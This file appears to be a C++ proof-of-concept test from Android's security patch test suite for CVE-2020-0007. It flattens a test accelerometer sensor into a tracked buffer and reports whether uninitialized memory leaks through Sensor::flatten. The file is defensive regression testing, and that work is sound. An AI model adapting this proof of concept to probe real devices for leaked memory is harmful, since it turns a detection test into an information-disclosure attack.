securityPatch/CVE-2020-0007/poc.cpp

/**
 * Copyright (C) 2020 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include "../includes/common.h"
#include "../includes/memutils_track.h"
#include "hardware/sensors.h"
#include "sensor/Sensor.h"
#include "stdlib.h"

size_t vulnerableSize = 0;

using namespace android;
char enable_selective_overload = ENABLE_NONE;

bool is_tracking_required(size_t size) { return (size == vulnerableSize); }

static sensor_t getTestSensorT() {
  sensor_t hwSensor = {};
  hwSensor.name = "Test ";
  hwSensor.vendor = hwSensor.name;
  hwSensor.version = 1;
  hwSensor.handle = 2;
  hwSensor.type = SENSOR_TYPE_ACCELEROMETER;
  hwSensor.maxRange = 10.f;
  hwSensor.resolution = 1.f;
  hwSensor.power = 5.f;
  hwSensor.minDelay = 1000;
  hwSensor.fifoReservedEventCount = 50;
  hwSensor.fifoMaxEventCount = 100;
  hwSensor.stringType = SENSOR_STRING_TYPE_ACCELEROMETER;
  hwSensor.requiredPermission = "";
  hwSensor.maxDelay = 5000;
  hwSensor.flags = SENSOR_FLAG_CONTINUOUS_MODE;
  return hwSensor;
}

int main() {
  sensor_t hwSensor = getTestSensorT();
  Sensor sensor1(&hwSensor, SENSORS_DEVICE_API_VERSION_1_4);
  vulnerableSize = sensor1.getFlattenedSize();
  enable_selective_overload = ENABLE_MALLOC_CHECK;
  void *buffer = malloc(vulnerableSize);
  if (!buffer) {
    return EXIT_FAILURE;
  }
  enable_selective_overload = ENABLE_NONE;
  sensor1.flatten(buffer, vulnerableSize);
  int status = is_memory_uninitialized();
  free(buffer);
  return status;
}